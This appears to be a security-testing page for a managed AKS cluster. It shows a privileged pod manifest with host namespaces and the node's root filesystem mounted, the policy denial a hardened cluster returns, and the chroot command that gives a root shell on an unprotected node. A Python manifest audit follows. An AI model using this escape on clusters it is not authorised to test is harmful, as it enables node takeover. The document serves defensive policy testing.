


tags:

  • security
  • policy
  • privileges

How to escalate the privileges of a pod to become root on the node

Context

By default, AKS allows privileged pods. Using the following procedure, a pod can escalate its privileges to become root on the AKS node.

What to do?

First, deploy a basic cluster with a dev namespace.

Then create a YAML file and copy-paste the following content into it.

$ cd /tmp
$ touch noderoot.yml

Content:

apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Deploy it

$ kubectl apply -f noderoot.yml -n dev

If the k8saas cluster is properly configured (i.e. the policy module is deployed), you should see an error like:

$ kubectl apply -f noderoot.yml -n dev
Error from server ([denied by azurepolicy-container-no-privilege-6134f47be9a69edbacdd] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}
[denied by azurepolicy-container-no-privilege-7f83897b6cbbf9956e71] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}): error when creating "noderoot.yml": admission webhook "validation.gatekeeper.sh" denied the request: [denied by azurepolicy-container-no-privilege-6134f47be9a69edbacdd] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}
[denied by azurepolicy-container-no-privilege-7f83897b6cbbf9956e71] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}
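The Gatekeeper policy above only rejects the `privileged: true` setting, but the manifest carries several other node-escape ingredients (host namespaces and a `hostPath` mount of `/`). As an added example that is not part of this page or of the k8saas project, the following Python check audits a pod manifest before it is submitted and reports every one of those settings, so a missing or misconfigured policy module is caught in CI rather than at admission time. The manifest is a constructed dict mirroring `noderoot.yml` (in practice you would load it with `yaml.safe_load`); the function and finding texts are this example's own, not an API of Gatekeeper or Azure Policy.

```python
"""Static pre-admission audit for Pod / Deployment manifests.

Flags the settings that let a container break out to the node:
host namespaces, privileged containers and hostPath volumes.
"""
from typing import Any, Dict, List

# Constructed manifest mirroring the noderoot.yml example, already parsed.
NODEROOT_MANIFEST: Dict[str, Any] = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "noderootpod"},
    "spec": {
        "hostNetwork": True,
        "hostPID": True,
        "hostIPC": True,
        "containers": [
            {
                "name": "noderootpod",
                "image": "busybox",
                "securityContext": {"privileged": True},
                "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}],
                "command": ["/bin/sh", "-c", "--"],
                "args": ["while true; do sleep 30; done;"],
            }
        ],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}

# Constructed hardened counterpart: same workload, no host access.
HARDENED_MANIFEST: Dict[str, Any] = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "safepod"},
    "spec": {
        "containers": [
            {
                "name": "safepod",
                "image": "busybox",
                "securityContext": {
                    "privileged": False,
                    "allowPrivilegeEscalation": False,
                    "runAsNonRoot": True,
                },
                "volumeMounts": [{"mountPath": "/scratch", "name": "scratch"}],
                "command": ["/bin/sh", "-c", "--"],
                "args": ["while true; do sleep 30; done;"],
            }
        ],
        "volumes": [{"name": "scratch", "emptyDir": {}}],
    },
}


def pod_spec_of(manifest: Dict[str, Any]) -> Dict[str, Any]:
    """Return the PodSpec for a bare Pod or for a workload wrapping a pod template."""
    spec = manifest.get("spec") or {}
    if manifest.get("kind") == "Pod":
        return spec
    # Deployment, DaemonSet, StatefulSet, Job: spec.template.spec
    return (spec.get("template") or {}).get("spec") or {}


def audit_pod(manifest: Dict[str, Any]) -> List[str]:
    """Return one finding string per node-escape ingredient found (empty list if clean)."""
    name = (manifest.get("metadata") or {}).get("name", "<unnamed>")
    spec = pod_spec_of(manifest)
    findings: List[str] = []

    # Host namespaces expose the node's processes, network and IPC to the pod.
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(field) is True:
            findings.append(f"{name}: {field} is true")

    # Privileged containers get all capabilities and raw device access.
    containers = list(spec.get("containers") or []) + list(spec.get("initContainers") or [])
    for container in containers:
        sctx = container.get("securityContext") or {}
        if sctx.get("privileged") is True:
            findings.append(f"{name}: container {container.get('name')} is privileged")

    # Any hostPath volume reaches the node filesystem; "/" is the worst case.
    for volume in spec.get("volumes") or []:
        host_path = volume.get("hostPath")
        if host_path:
            path = host_path.get("path", "?")
            severity = "entire node filesystem" if path == "/" else "node path"
            findings.append(f"{name}: volume {volume.get('name')} mounts hostPath {path} ({severity})")

    return findings


if __name__ == "__main__":
    for manifest in (NODEROOT_MANIFEST, HARDENED_MANIFEST):
        for finding in audit_pod(manifest) or ["no findings"]:
            print(finding)
```

Run against `noderoot.yml` the audit reports five findings (three host namespaces, the privileged container and the `/` hostPath), while the hardened pod reports none; wiring `audit_pod` into a pre-commit or CI step gives the same verdict as the admission webhook, plus the settings the single `container-no-privilege` constraint does not cover.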

Otherwise, the cluster is vulnerable: the following command chroots into the AKS node's root filesystem through the pod:

loicjardin@TDS-Loics-MacBook-Pro /tmp % kubectl exec -it noderootpod chroot /host -n dev
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
root@aks-agentpool-12335712-vmss000000:/#

TADA :)